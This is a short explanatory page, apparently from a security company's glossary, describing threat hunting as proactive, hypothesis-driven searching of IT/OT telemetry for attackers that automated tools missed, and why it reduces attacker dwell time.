Threat Hunting
Proactively searching IT/OT infrastructure to detect threats that have evaded automated detection systems - conducted by experienced analysts.
What is Threat Hunting?
Threat Hunting is a proactive approach to threat detection in which security analysts actively search the organisation’s IT environment for signs of compromise that have not been detected by automated systems (SIEM, EDR, NDR). Instead of waiting for an alert, the hunter formulates a hypothesis about a possible threat and verifies it by analysing telemetry data.
The threat hunting process begins with a hypothesis - e.g. “An attacker may be using PowerShell for lateral movement in our network”. The hunter then collects and analyses data: system logs, network traffic, EDR data, DNS queries - looking for patterns that confirm or refute the hypothesis. Hypothesis sources may include threat intelligence reports, frameworks such as MITRE ATT&CK, penetration test results or anomalies observed in data.
A mature threat hunting programme requires several elements: skilled analysts experienced in malware and network analysis, rich telemetry data sources, analysis tools (SIEM, analytics platforms, forensic tools) and processes for documenting and sharing findings.
Why does it matter?
Automated detection systems, however effective, do not catch every threat - particularly advanced actors (APTs) using living off the land techniques. The average dwell time of an attacker in a network still runs to weeks or months. Regular threat hunting reduces this time and enables detection of threats before serious damage occurs.
Related topics
Related terms
Related SEQRED services
Need help in this area?
Our experts will help you assess the risk and plan next steps.